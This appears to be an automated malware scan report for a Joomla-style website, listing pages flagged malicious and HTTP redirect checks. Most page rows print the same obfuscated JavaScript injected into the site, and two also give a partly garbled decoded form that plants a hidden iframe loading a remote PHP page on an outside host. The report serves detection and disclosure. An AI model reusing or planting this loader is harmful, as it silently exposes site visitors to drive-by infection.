Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scanderbegair.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://scanderbegair.com/ | 200 OK Content-Length: 70476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c76737775 Decoded script: String String function zzzfff() { var gv = document.createElement('iframe'); gv.src = 'http://app.ophubsolutions.com/prWMHCJV.php'; gv.style.position = 'absolute'; gv.style.border = '0'; gv.style.height = '1px'; gv.style.width = '1px'; gv.style.left = '1px'; gv.style.top = '1px'; if (!document.getElementById('gv')) { document.write('<div id=\'gv\'></div>'); document.getElementById('gv').append ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://scanderbegair.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://scanderbegair.com/templates/gk_thenews2/lib/scripts/template_scripts.js | 200 OK Content-Length: 2245 Content-Type: application/x-javascript | clean |
http://scanderbegair.com/templates/gk_thenews2/lib/scripts/menu.php?style=moomenu&width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 2591 Content-Type: text/javascript | clean |
http://scanderbegair.com/index.php?option=com_content&view=article&id=19&Itemid=27 | 200 OK Content-Length: 40586 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_content&view=article&id=22&Itemid=34 | 200 OK Content-Length: 29679 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_content&view=article&id=5&Itemid=2 | 200 OK Content-Length: 40067 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_content&view=section&id=4&Itemid=37 | 200 OK Content-Length: 27446 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_content&view=section&id=3&Itemid=41 | 200 OK Content-Length: 27837 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50 | 200 OK Content-Length: 43656 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_weblinks&view=categories&Itemid=48 | 200 OK Content-Length: 26179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_newsfeeds&view=categories&Itemid=49 | 200 OK Content-Length: 26925 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/index.php?option=com_user&task=register | 200 OK Content-Length: 27722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c767 Antivirus reports:
| ||
http://scanderbegair.com/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/x-javascript | clean |
http://scanderbegair.com/./ | 200 OK Content-Length: 70476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e75842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e75843c8180712e4b2e357682827e483d3d6f7e7e3c7d7e768370817d7a8382777d7c813c717d7b3d7e80655b565158643c7e767e35491b182e75843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e75843c8182877a733c707d807273802e4b2e353e35491b182e75843c8182877a733c76737775 Decoded script: String String function zzzfff() { var gv = document.createElement('iframe'); gv.src = 'http://app.ophubsolutions.com/prWMHCJV.php'; gv.style.position = 'absolute'; gv.style.border = '0'; gv.style.height = '1px'; gv.style.width = '1px'; gv.style.left = '1px'; gv.style.top = '1px'; if (!document.getElementById('gv')) { document.write('<div id=\'gv\'></div>'); document.getElementById('gv').append ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scanderbegair.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 20:08:19 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Dec 2014 20:08:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ce5bc8fcee61a31863719991b11aba87=cdajc2l090acsglgrnb1q9ll61; path=/
GET / HTTP/1.1
Host: scanderbegair.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 20:08:19 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Dec 2014 20:08:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ce5bc8fcee61a31863719991b11aba87=cdajc2l090acsglgrnb1q9ll61; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: scanderbegair.com
Referer: http://www.google.com/search?q=scanderbegair.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: scanderbegair.com
Referer: http://www.google.com/search?q=scanderbegair.com
Result:
The result is similar to the first query. There are no suspicious redirects found.